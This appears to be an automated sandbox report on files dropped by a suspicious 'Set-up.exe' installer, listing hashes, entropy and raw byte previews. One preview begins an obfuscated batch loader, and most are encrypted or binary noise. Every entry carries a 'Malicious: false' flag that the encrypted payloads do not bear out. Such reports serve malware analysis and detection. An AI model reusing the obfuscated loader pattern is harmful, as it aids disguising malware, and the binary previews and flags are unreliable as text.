SHA1:	2EC1FDEB95A813CF6B89EBB6C5B6120CF1EC7AF1
SHA-256:	814D89A6311D206AFA43133E06635ACD499FAAEE5CD810605637FF538DE356EE
SHA-512:	F4DEA36BF09C47CB0FFC5D93848378E13413FBB934A1B5B35AD46F3059CEC7834FC8180A7F1F66C57D6C471E7EEF9905677BDA79AE1F547F0EB830E14E95782F
Malicious:	false
Preview:	Set Isa=K..KnzMitsubishi-Providers-No-Ticket-Vertical-Fool-Rally-Mh-..bUfMention-Dating-Lions-Velocity-Certainly-Attack-To-..jXTrackbacks-Cathedral-Techniques-Albums-Foul-Belly-Bags-..UmaPresents-Utilize-Approx-..WnGMCon-Subaru-Strongly-..Set Mounts=c..DbCock-..oLiPersonally-Returns-Hook-Kingdom-Gba-Xx-Passengers-Indianapolis-Brad-..ZpfPotatoes-Convenient-Imports-Kentucky-Thousand-Replaced-Declare-Utah-Latitude-..UwxwAta-Folders-Holly-Johns-Toolkit-Livestock-..blpHCalibration-Strengthen-Urls-Tell-Want-Divx-..aYtSides-Gods-Quarters-Puzzles-Difficulty-Poland-Neck-..EGQDisplay-..KzzReporter-Defects-Ethics-Disease-Beef-Bother-Bell-Metro-Suggesting-..NRIIPrediction-Nuke-Beyond-Congo-Shield-Investigator-Sara-Null-Sizes-..efPolyester-Exercises-Dosage-Technologies-Compounds-Greatest-Crisis-Structure-..Set Closing=b..HYOlTide-Initiative-Nz-Diving-Sensitivity-Naked-Descriptions-Had-Verification-..JsniDrinking-Lists-Acne-Foundation-Thee-Pound-Gmt-..gkGStudent-Disciplines-Surgical-Ai-..fHEnemy-Ins

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Childrens

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	111616
Entropy (8bit):	5.724279431073437
Encrypted:	false
SSDEEP:	1536:zcd0vtmgMbFuz08QuklMBNIimuzaAwusPn:CeAg0Fuz08XvBNbjaAtsPn
MD5:	07996947A147F1AF5313D5CE7424B148
SHA1:	68545A3F651B16ECFAC174BF8ED51FCE458BDCF7
SHA-256:	8C4FC164F14874D4ADE024D80B2E961EA44A1DD22984EE38A9D429815F530218
SHA-512:	FDFB154B05A8531066395803C6FD392AA09B1F877CFCB1ED73AF078D728ACF878F1CEBDA22FDC1F737C2752DBE21654E6A58261DAE232727AB77784E0CC03F0A
Malicious:	false
Preview:	....eJ......eJ......NJ..... eJ.X....OJ.....,eJ.Y... PJ.<...8eJ.....DeJ.....PeJ.v...\eJ......OJ.....heJ.[...POJ."...teJ.d....eJ......eJ......eJ......eJ......eJ......eJ......OJ......eJ.\...8XJ......eJ......fJ......fJ.....4fJ..... OJ.....LfJ.....XfJ.]....OJ.3...dfJ.z...@PJ.@...pfJ......PJ.8....fJ......PJ.9....fJ.....(OJ......fJ.^....fJ.n...0OJ......fJ._....OJ.5....fJ.\|....GJ. ....fJ.b...8OJ......fJ.`....OJ.4....fJ......fJ.{...xOJ.'....gJ.i....gJ.o...(gJ.....8gJ.....HgJ.....TgJ.....`gJ.....lgJ.....xgJ.F....gJ.p...a.f.-.z.a...a.r.-.a.e...a.r.-.b.h...a.r.-.d.z...a.r.-.e.g...a.r.-.i.q...a.r.-.j.o...a.r.-.k.w...a.r.-.l.b...a.r.-.l.y...a.r.-.m.a...a.r.-.o.m...a.r.-.q.a...a.r.-.s.a...a.r.-.s.y...a.r.-.t.n...a.r.-.y.e...a.z.-.a.z.-.c.y.r.l.....a.z.-.a.z.-.l.a.t.n.....b.e.-.b.y...b.g.-.b.g...b.n.-.i.n...b.s.-.b.a.-.l.a.t.n.....c.a.-.e.s...c.s.-.c.z...c.y.-.g.b...d.a.-.d.k...d.e.-.a.t...d.e.-.c.h...d.e.-.d.e...d.e.-.l.i...d.e.-.l.u...d.i.v.-.m.v.....e.l.-.g.r...e.n.-.a.u...e.n.-.b.z...e.n.-.c.a...e

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Collective

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	872
Entropy (8bit):	3.667154389543028
Encrypted:	false
SSDEEP:	12:coyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:XyGS9PvCA433C+sCNC1
MD5:	B405FDB499270DB2B6EBEF63160CEC21
SHA1:	8CEF8740A7566577A6CCCC722A52D2ACE99B26C9
SHA-256:	13834A8C9BB65F5A8E997A222C702AA02952091BEBAA9998ED623C51CD3308B3
SHA-512:	DFCFE2BFBA238FEFFB6335C273F950F580E99B730B55FDFD417D7DBE9DA4732FEA16D727D177FFD6DC5FE1999B002E390F25C643E4AA34B67A4D4224F58845ED
Malicious:	false
Preview:	SIGNIFICANT........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.....................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Debate

Download File

Process:	C:\Users\user\Desktop\'Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	80896
Entropy (8bit):	7.998002217971811
Encrypted:	true
SSDEEP:	1536:ZQhl0oQ/uB15rGmYfRcgTptmAPkG7Nt4KiWxssf/bLQRf0+jzo6YD6R8R:oaoeuD5klvmAPkG7Nt4QxssfzLyHjctd
MD5:	6075C6B0860A8B086041283FCA3E2CEE
SHA1:	A4BF052991BFFDB3C07BD94802BA0F85E8782804
SHA-256:	3553950DA9B3B37EC30F2926B97F1BEB7D052BEE55C4166AF35E51998E854507
SHA-512:	DC63F86CF8DB680A272254C98A7A4C398E91D321CC54F5830CABAFF88A85041B087A6B7826DDDC9CB18596B19DFE54C80DE50678C50AFB5919EC4CFBC19954FC
Malicious:	false
Preview:	.~p...j.../.M...3.;...4.....d^c.....ia....r(.6.l.%i.0.....}]....u..J>.Dm.A.~B..+.......v.e...X...O...Z;?..ko.+.....q...4..KVo"..2c..5..N."..k...=\|.J.\|......n...\|d........P...M...(.U..6p4..mb...\o...=.a.v....JL.l...x..7#i.m....L...L.3;...C....&y.K.F..>V)EP...Z...$...f......s{.Q..2.&......."....\...^...@W......6.O.D."Tj.{.. ...%r....1Q\|>9?.....D..`...S..c.....SeVr.Z#"....FP.A",. ...3..k}..G...93.....ZI...2...6 [..h.ng../......y}...+N...,.b.1......$Af...........9?.\..3..e.&.\........%M..g..d.m6.QXB...B.v....jb.6u..0!...z)..8..d..D5...}...Uo....R..fl.N..t...Nh=,66nS.Y..}...\|...O.o.[B}.....'r.A..c".e......X... .B%...S....B.#l.;]v.n.}....v.=.?L..E..&.".Y~TC@.+si?!H..n.-.,..C.6..y!0..:...J...n......:5...S.......*PL..fm...>.{....<...qk.v.a.t.(c&...%.F..'...^.M....h"..&BZ.=...e.].....(..$..a%...._Y......3......4.ja.....S&..k.(2]u.;..Uv. .O.4DU.."...6.8v....,...S`..O...2.w....P]..k.(..!..z..X<..{..j...!.R............C....Z=..U~....AO86...$

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Descriptions

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	68608
Entropy (8bit):	6.64623190551569
Encrypted:	false
SSDEEP:	1536:MmV3BxZxu6/sPYcSyRXzW8/uC6LdTmHwANUQlHS3cctlxWboHdMJ3RP:pBxT/sZydTmRxlHS3NxrHSB5
MD5:	5ACA083A2D75F2A1D139AFF39F5D3520
SHA1:	309B4466EB783998B76E79F81DE908EE3C6027C3
SHA-256:	10F969DA5E22F0512E758B5033ED425BF7BCBAA91DD6C9DE7C9EC25279B0DA00
SHA-512:	1DB37C21D8172F5CD31E1CC5D7D26CD21347C385E70CB0B81CAB5E33B6DD6610C3A9CA318ABF964D5747EB5873994EDAE82F5361969BC7865D145A0374E07129
Malicious:	false
Preview:	...t5..%....=....u"..O...............................U.........u..............L......3....E.,K.......K.94. cL..u....;M........E.<W@.}..E.;E...Z.......;M.......;~\|.......}........E.....t5..%....=....u"..O...............................U.....................L......3....E.,K.......K.;E....;M...+....E.<W@.}..E.;E...`........;M.......;~\|..Z....}........E.....t5..%....=....u"..O...............................U.....................L......3....E.,K.......K.;E....;M...}....E.<W@.}..E.;E...`....b...;M...\...;~\|.......}........E.....t5..%....=....u"..O...............................U.....................L.........E.,K.......K.... cL....t....t.3........;E........E.<W@.}..E.;E...N.......;M.............E.;~\|.."....}.......t7..%....=....u&..G.......%....................E.....E......w>............w..........rX........... uJ..........t.......u5.u../ ..w.tk........)w......E..$...E..._ ..tJ...0..tB..3............L.........E.,K.......K..<. cL.....;M........E....E.}.........<G.E.@.}..E.;E...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Educators

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	121856
Entropy (8bit):	6.557556563140663
Encrypted:	false
SSDEEP:	3072:MkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLh:MkB0CThp6vmVnjphfhnvO5bLh
MD5:	B7B88711B513E2127F51968E921F5868
SHA1:	9CA0E74B1BD88C72486FE5E50582539D03FCE87D
SHA-256:	21A77E3B7DFB5AB02558B8E3D548C62621DB1DB74B37353A51AAFDBDA01FD757
SHA-512:	66FC4C03F8AC1E02EDCF425DA1B35FC48DF6845EBC21A3846D1A8440909D64467585C0A36A7C78899E99DF69E1160E17DCECBC6EF3532447D46F3931EF32BFE9
Malicious:	false
Preview:	..M.Q.p..0....I...t..-...)M...E..(M.P.....u..E.P..T.I..E.P..L.I.j.3.PPP.E.P....I.....t.....................=b#M..u...g#M....b#M....................u.3.@...=g#M..t.j.X..3.^..U..Q.}..SVW..........d......E.t..u.....u.........}..t...3M...........4...;.r..E......._^[....U..QQ.}..SVW....d......E.t..u..8......T....u...P.............E.......I..T9..D9...t..H8....I..]..M...t&..t...t..@8P....o..........#..C......u....*....}..t...3M..?....}......j...;>r..E._^[....U..V..W...N..@.... ....}........G.P.mo...G.......;.t.P.ky...G(.............G,.......w0.....G4..4..........G8;.t.P./y..........GH..D....GL..H....GP..P...t..GT........Q..........._^]...U...8VWjX...M...Y...".................Q.O....n.........O.;.t.P.x.........O8.G(.......G,.........G0.......G4..4...;.t.P.nx....D....M.GH..H....GL..P....GP.......GT.I...P...N..@........M......M......._^..U..VW..j..w..}...Y.u...........u......G..A..G..H..O..G._^]...U..VW.}.....Q..A...t..B...t..P.;.u...;N.u..V.Q.....'..N._^]...U..m..u..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Entire

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	82944
Entropy (8bit):	6.6863457726895374
Encrypted:	false
SSDEEP:	1536:drbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPR:84CE0Imbi80PtCZEMnVIPR
MD5:	862871CA3CDDFE3E0E96B36090E076E6
SHA1:	78ADF9B6AD776357EDB52B8D9F6EA615AC6C75D3
SHA-256:	172B959C6D19D5CCA852BB80D15C6CEABCE1F1ED979ED4C3C2F63357175C9375
SHA-512:	14267ADA39AE46F5E8062B8A4579B223740EAE3A5984A2FBB0AE0BD6AE8B6D7EAE1F7FF38F52C45693029704E78ABD1C5396E95E5F36D5DB37BCE3A8AC85878B
Malicious:	false
Preview:	..f9>t..O.....n............_^..[..]..U....VW.u..E.P.......}.YY....}.._^u.3..Uh.....u..E..u..u.P.?........u.E...t.M.....M.....E.3.H..E..H..E..H..E....M..E..A..E...]..U..M....@t.2.]..@....]..U..M..........t.2.]......]..U..M........t.2.]..........]..U..E..8.t.2.].M.......I.....]..U..E..8.t.2.].M.......a.....]..U..E..8.t.2.].U........u..J................J...]..U..M........t.2.]...@......]..U..].}...j.h.L.....e...E..0....Y.e...E....0........?k.0.....M..D.(.t.V.....Y......l............u..E.............q.......u.E..0.....Y..U.....E..M..E..E.E.P.u..E.P.Z.....]..U..QV.u....u..sl... ..~l.........S..x7;5.!M.s/....?...k.0.....M..D.(.t..E..E..E.PV.}...YY...#l... ...l.........6......^..]..U..VW.}.W.....Y...u.3..N...M....u........u....u..@X.t.j......j........YY;.t.W....YP..`.I...u...0.I...W.....Y...?...k.0.....M..D.(...t.V.Uk..Y.....3._^]..U.....E..M...?.U.S...VWk.0.....M..M..L8..M.M...t..:.u..L8(....d8(......E...;........B...............t...FC@.....M.;.s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fascinating

Download File

Process:	C:\Users\user\Desktop\'Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	7.997808085147738
Encrypted:	true
SSDEEP:	1536:+y65aAXltIVR6PJWwbDCX4H/GRV0iEUtSNWvCMnkjVdaNXdJEmv3RWzzxXd4t3rE:+yEaAXlGsRPD7UVFEUrvCMkmX3EmfRWB
MD5:	CE4FBA13574BA63B632D3083F8D896D9
SHA1:	10D2B59832125529D51EE8037B71128FC8414133
SHA-256:	49746142381A65A080BD2926606D57756A7D5622C5674513D8A36819AE732A15
SHA-512:	B436C08E1939E8BAFAF6F10CA3A9709D664A9A2720897AB55D92C91FE8845459291D5AE7AEBC20C2FAD00FA71ED29122978477C6E548861371B382205F6D7B08
Malicious:	false
Preview:	.-.evf...../ .....`u-.,}...(...5+x.3.A...L.,_..!.........J....yXl....h.~.V..D/R..2..}M_...:..e$.q.xO...G.cG.^Oc...2.D ..%..0.J<@..h.(....E.t..3.^.S.N......7.."+.{.f...Uc...D...B93....~#....;....J..(...Xc.\|..W.....e...z$..!D...z. .@.\.. z....3b3.k.j8...G,.'@.N..N.......1P6....X.s..St^:bQJ.I....r{f[..Oo..-.v..._h...r..g.%.`...6.^s.-....=..w.&....u9...L....y....!I....>.#.DW.a.....,.....1..x..W.X...A....nh.PagQ1...6O....(.Y0%D.i.;....t.!D.....n..O..\t4.DU.}Y..;1f.....4x.`......m'f.DM..G.}..jjND.....v..-QV~K.j...t......v.O.]w.{\|.l.2f..w.J..6K$... r.w.......fuwa[.1..X.e...=,. +. Sl..)CDY...^.Xz.6...,.y..........c.lj....4)H....,[I.p...#............H..;.......q....x..E.?.aTU..=.+....Z=z....a...%..`&hD=.(....%..<..0.5L....C.. [...X....A...C..dD..X0).ZJ...j...o..R.:...oW.9..,..N.4e#....b`0w'j....#7.d....f..FCi ....z.......2k.b.........D.p.........'3....I@....N9&...8O..5z..b....(.....y+.u..g..ad\|.h>HD.....Y..Q0:..:.wc..{'.V.3Q

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Groove

Download File

Process:	C:\Users\user\Desktop\'Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	7.997524366437343
Encrypted:	true
SSDEEP:	1536:1zFyxp6jkq1uffrqCAVrle9tTGZ2YUURKYfi+SoXz9etd9NXA2prHV:x8xp64qoHr4Vr2GZ2YUhgzXRQX7r1
MD5:	E8CD20A6A5C2793D3AE6315DAFD89E9F
SHA1:	C4601EE96F0312356FA376ABE5D4C95DFAAC4C3E
SHA-256:	4E6A50895DAF632779736EE6F0119AA66728AC5E2232B9FAF4D81765B1257AC0
SHA-512:	006E989148D5EE1BFA14E14AD19B3041BC80E5972BACB318EC0F3A5F566A8189DF496C107CDC8322C61C5AA7662B181447DEB9D48E56A7F3ED8A23AB370615BF
Malicious:	false
Preview:	'..i...7>..]kS.........kp._.d(~.y4.3.x..-.....PA....>R=L".c.BF...............av..._....._..'n~.....,....1x...5L...PV.t.."7...R`!.......7..t..1.l.._.W..5........C3.,.Tb`W.?E_.~.r.y6v.T....".}....&B.....86../.j,9..B.Vt...m.B.z ..f.......X=.......R.9.7.7.Y....)....r)...W._S...(..}..._....s..w.[Y.P..y.k.......f...ew8....\..}9....]1.zo..+\..e......H.._..=.......xa...-&..9..1vUw.{v.'j.g........L.$."$z`E'.t.zB...gR..;.....E.....nO...:>......ea...$$....7..q.7...>"..8....-..v..f<.l.n0..M.....!....L.c...,KJ.L...:.L&.q.i.z...]....,..~.Q.~..B..M.I.........tT..I..9.Vz/..~<RM...n..p.Dt...x......j_"..f.V.j...s..z...HM+.-...e.."o<>A..'...D.....9.]....^2V........(...`.f..6n1....PS.....wXX?....;....mJ=......[B.".#.....(O.;.p.u#..N.:L.S...}....l...w>F.YI.=..TC ?..#.o.T.mRD..!R.Xkoi..f.'9...HW.D.,......~j..K...]O.W).Y..V....S2.!y;...D.R.s\....4.9[...jl.Z3..G..g.....*.0.m'...vG.....p.G......V+.._.Y\b....f.Y.......%I.@.....e....K.>BQ...<F..J.QnmL.F(....~.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Mailman

Download File

Process:	C:\Users\user\Desktop\'Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	32436
Entropy (8bit):	7.994370571457166
Encrypted:	true
SSDEEP:	768:9pFdu9uWB/xJfe3z9pDks4cRwRDMpddgrW3KzXAGehcVBP:hopZJ2ZX47DMhgrW6FehcVh
MD5:	2CDC981ED4DFEF7FBA89BD34918CE560
SHA1:	F3337132C05926A24141ED930AF2FD59FE802325
SHA-256:	55050970A16DD09EC827DD3CD7335B77AE2B12C772B1B6DA794F4EA2A9AFF356
SHA-512:	B01DE2C03F54F0085463910FC6D5648011234312AA38439A632B0FA3764D5E90FF5F7988403A9E2DB56C97C257EDB670359642F5A69E265196C9FC30BA01CF70
Malicious:	false
Preview:	B..=..+R-..6m5.....`VK...........Sw(L...Y...d&.F...<...L/.Q9..U.\|.a...3...v....h..a.[".$to......G...... ..WO,1P.......?......".....L....-....]..S5....PE...2.O...;;.%g<..xZ@.4.V..S.....)..U..Sy.C':Jz....j.~gmIh.+..h..uJ<..4.i..<.'S.....^...4-q....3.]7......af.`.._...r....n.+.B./\.2....^.GR.....CP...J......7T.."..@D.!...O..-..6ir.....).......6%...42...!}...i........;.9LY..1......3..%..T.i.:.7r........l...o/.....O^.y...Ymh. .........0.}..,...Y.3...Dx`.G5:.&....e2....p...z+.0..S.p.c..i.a..k.....$.nU...,Rv..AF....y.B..SrT...bwN..z/..U..F.<.8 ..9.N..`.r6Y..a{.q.9.4.....h..5..o"y(.....I.b....H.U{.f.$....q......_._d>qB..8.m.9..a..,...>t.)qQ\Wz.d=.........H.j}.M.Q.8..A..R.\..$=..Y.<E1........b.$2. .....X....k....[,.....I.+]@Z[.t.ew..WJ.t..u.;.*..W3.+ Dj...Z[.M..#.Xd.w.......86..O..L..,xYs.e).\|....5.?. ...0...gB^..d.....w..,,.um..K..e.%.j.S..t...q..6.fQ{......wY!..B.....]P.2.E.SB....m.qj...\|.H....P....\|..TB.]$.^....../c.f\.].......m.u

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Pioneer

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	130048
Entropy (8bit):	5.425123608795953
Encrypted:	false
SSDEEP:	1536:dKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdATI:h6whxjgarB/5elDWy4ZNoGmX
MD5:	E576B56FC95382756B2DE4FBC87F0D81
SHA1:	1C5B02FB9138880B0A1BE2AAF8CEC79180346C9E
SHA-256:	4A3268A6FEFE2A45F0983082C687D4588FA8AE03C568DFB364A4B1415C0660FF
SHA-512:	EA88FF04EC394AED9E9680BFAEA63ED76C14E73B51B9EEB2130EBA00872B9AD99BD264FA35404E2B9D70A648FF90FEBE3B6E13768318C0DB672C7B0F42110907
Malicious:	false
Preview:	...................................................................................................................................................................................................................................................................................................................................................G...................................................................G......................_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________.________________________________._...............................................................................................................................____................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Poster

Download File

Process:	C:\Users\user\Desktop\'Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	82944
Entropy (8bit):	7.997690833126109
Encrypted:	true
SSDEEP:	1536:TybwhMAPE60uyMo0FcEZRg2ertV10l+vLgZDlr/CQhCOKfUOIutlCi:HaA86OOfJSV10l+vcpraQMOKsO5X9
MD5:	D76EC37C85CFF726BB2044A2141EBC11
SHA1:	41229D11256A4CE41494C89D3451E76C60D5DA0B
SHA-256:	60483B9D363C5FF9B3639DF7C52BA84134978998B433E0319E2AB946EFD8BD10
SHA-512:	D8DC5397FCAC5E8D8E427BBB9DCEF19E658C050EB8B9CF413F225DF4A409AFAE61C3A6EBC4DE3AEDF7FA6AD2B3766C523503BED91EA54576B1F9F54006E03099
Malicious:	false
Preview:	..A4g\U..........N..x.]."f....9.G2.....w...^...d.V.."...a.....-...h../.I.{....GG%S%sR,$..C0.....C....u...f..k....I.6}.....E....L.A.!.o..}..<Q>KT..$.7T.j..V.......'cku..3@.o.~.W...?.....^.v..?.$.%bN..!.TY.R\c...{{.r.U.."...,.n..f.]....a............D..i.d.(k...../..d.YJ.....;.1.$!...ICg&9P.7{.w.i>_GX.5..I.(.....a....~!j2.I..Z.z.Ki.'..F.t>-C. _..c..=.%....tc~-.m....y}.+..~.j..;......>..Z....y....0B..!.n.V..(g.....u...".PU..cx.r.O.\|.#../?..G......t.< .a.d.V..un."O..kR........fq.E=...z....P).C/...)R.x<N..J.w..).q.....s..Y...ZHzS.8HJ...a....Ur.A.w.....\j..`..[..'9.8..s..5.>.[.}..6.3..K.'..(.E.9\...9.3jLc+Y.U.B.t.R..J..^q.....Y".t-.....x. ...Xz.U..3..#".7z.@42.g.#.y...=D.h...`cn.S\|.....V':8V..7.5e$a.,.[..F.q..[.x.m..M....hz...+.Iv.P...O.....f..<.i.[....O.?...,.. 3.....z.nl..Xd..c..b .}.4 .....?....R.)..'.K.W...;.z...f.Y..X~..S.......<23.Z......y.M._....Tu<.5..pX.v.m4......R..........)..[a.)#Y.N/.....@..."v.\\|...Qe.t.x.k`..s.v........`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Premium

Download File

Process:	C:\Users\user\Desktop\'Set-up.exe
File Type:	Microsoft Cabinet archive data, 488552 bytes, 11 files, at 0x2c +A "Pioneer" +A "Retrieved", ID 8029, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488552
Entropy (8bit):	7.998087293751548
Encrypted:	true
SSDEEP:	6144:31Quuh5eLqTSSjL968H2xc5DQyLHDDSBpOmnhAUL6lWvgyvYCwLkEaWRIykE7qut:OhImbL962dBXwOmVmcvBv6L8UktWgi
MD5:	FBEFD6A35150B1120C9563E81E9F8D04
SHA1:	28AEAC9EAD2EDA3EF022E25D8F6C0A64C4793A4C
SHA-256:	C82CD2AAA850034A0CBFC9DFE0241BB7771BE3A1B8EF41A9239ABACED15EF94F
SHA-512:	69788DA3D7FB19FF6122461614122DF31B634AE38D010677C55C79F8884C8ADDE183332C05B0B8F8EB64934E91E376272F1FC26F3399F5F839546ED4A0890CE3
Malicious:	false
Preview:	MSCF....ht......,...............]...5.................'Z.f .Pioneer..\|........'Z.f .Retrieved..D...x....'Z.f .Entire...........'Z.f .Educators..l........'Z.f .Thats...........'Z.f .Descriptions..4........'Z.f .Believe.h....D....'Z.f .Collective.....cH....'Z.f .Childrens.....c.....'Z.f .Sk.....c.....'Z.f .Sb...?1(..CK.:.xT..'...IX\pA..a.D.".df.B&.0......$..7.B.fi.J....."."..E.@..qAQ...-Hi.n .....{.}.,..........{.=..s.=..;/........U...]'......m.6.Ao.....m.e.m....wv......@k..p..v...y{...?.t...#.G..'.....]......q<.-.k....8.!.q.C....8.!.q.C....8.!...p...-W.......8.7......?!...}/Q...@....6t........2..........a..kg.s.&..y2....H..".....P...l....PL[.JsPyf.Y...-.^.e`.m....M...@I....y.....w.......{.{.f.!...'....7.8..dk.>..M.*.tbG.k.C..nS....qV.J#\z..`+..._1.$v.;..c...\|&.k.\E8N..Q.....B...XJ...?G.~.e.~...F..E..G..D..F..E..G.D.....b........As`;'.Fb.$....i..S.....R....Nc.k[.h't.m.#PV.:.........e,.&.9.1.r.Gb....c.N..NseD.q..Z..-z.B...Xk..OE4.....<...Mc...'..3>..e

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Retrieved

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	31995
Entropy (8bit):	7.1892106327708
Encrypted:	false
SSDEEP:	768:hQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:hODv7xvTphAiPChgZ2kOE6
MD5:	9862986105585390129F9F9A40DE8CAD
SHA1:	70F4386D13DCECC9D93CB60F51E3248FF8C2239F
SHA-256:	8E82859F546069D40B390688CA9C84DF25AA7EE02E76CF2A5F3E2CB146A2404C
SHA-512:	7B2E5B10CAAF79341BB55B37A5B25C096766A8B2EBE118198DEA63E46673491D70E58E6BDEB93237D55065B2AB7886B9CA88BF4668605E6D78C159E48107713B
Malicious:	false
Preview:	>,>7>?>C>I>M>S>]>g>q>\|>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.?.?"?,?6?@?K?S?W?]?a?g?q?{?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?......4....0.0.0"0&0,00060@0J0T0_0g0k0q0u0{0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.1#1.161:1@1D1J1T1^1h1s1{1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2.2#2-272B2J2N2T2X2^2h2r2\|2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3#3'3-373A3K3V3^3b3h3l3r3\|3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.4%4-41474;4A4K4U4_4j4r4v4\|4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.5.5.5.5.5$5.595A5E5K5O5U5_5i5s5~5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6$6.686B6M6U6Y6_6c6i6s6}6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7$7(7.72787B7L7V7a7i7m7s7w7}7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8.8%80888<8B8F8L8V8`8j8u8}8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9.9.9%9/999D9L9P9V9Z9`9j9t9~9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:%:):/:9:C:M:X:`:d:j:n:t:~:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;';/;3;9;=;C;M;W;a;l;t;x;~;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.<.<.<.<&<0<;<C<G<M<Q<W<a<k<u<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Sb

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.696469117031612
Encrypted:	false
SSDEEP:	3072:kUDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAP:kUDtf0accB3gBmmLsiS+SAP
MD5:	3DE0187F428E524195A73FBFB05C3FCB
SHA1:	1B50D0889D9886F1401027FDCD08B00D0FAA9395
SHA-256:	18FA7D706BFB1B1C04C49BC0F9C8BE868F167E8610F7DF9B5DB20A83D61297A6
SHA-512:	FB51ECE0CB35FD90EA3008BC9C5D55418CBF76EED33852C2E4C9A68F93A4B8A3720A201F29AFCEE81C788388D68C6CDF91F365A91645BA9D6CCE5857E0081A0E
Malicious:	false
Preview:	.........=..........=............}tB=....tB=....t;..U..2.....V..).....^.. .................w...3._^[..j..P....E..u.@P.F...U....SV...E....W..E.3..E.}.......0........f;...A......f;...5........f;...'......f;.......j.X3.B...............E..E.f..1w/f..0......f.........f.....p...f.."......3._^[..f..6t&f..8..O...f;E........E.....f;E.v..........+...U........^...M...M...E.SV...E.....3.].U..u.W...}..}.........M....... ......(.....K..,.....K..0.....K..4.....K..............U.j([%....f9..].E....................E................ ...............#.;.........j.Y%..p........M.3..8.....t......<.....H.....8.....8.....P......x.....l.....h.....X.....\.....T....U..U...\|....U..d........`.........@...f9.t..@.Af9.u...O.U...D......w.U..E.E.8....E....f..8....E.P..(....U.PR.E..p...P.E.L...P.E..].P.E.PRRRR.E.P.E.P.U..7....u..4.........}.............\......X....E..4E8...V.......Y.........s.3...ERCP.E..C..E..C..E.C..E.C.3..C.j.Xf.C"f..\...f.C$f..X...f.C&3..C(.C,.s0.s4..h.....l....u..u

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Scheduling

Download File

Process:	C:\Users\user\Desktop\'Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	7.997500707736438
Encrypted:	true
SSDEEP:	1536:R/lH1tPWFqYf8CQ7aXx7SSQiFupzN8BJroHKFdgHRwdA6x3X7ga:h91tPWFqYfzQ7aXx+rX8B6KFiHmA6xXL
MD5:	10ABF9E32F4840B73FDA48A2A374A771
SHA1:	76BCE4FB2DADC4F5623E67BD14F1F6516EC98632
SHA-256:	FA250DA2E0430A2879EE804E8280E7F6FAFA5CA372B130B7508C7578C022095E
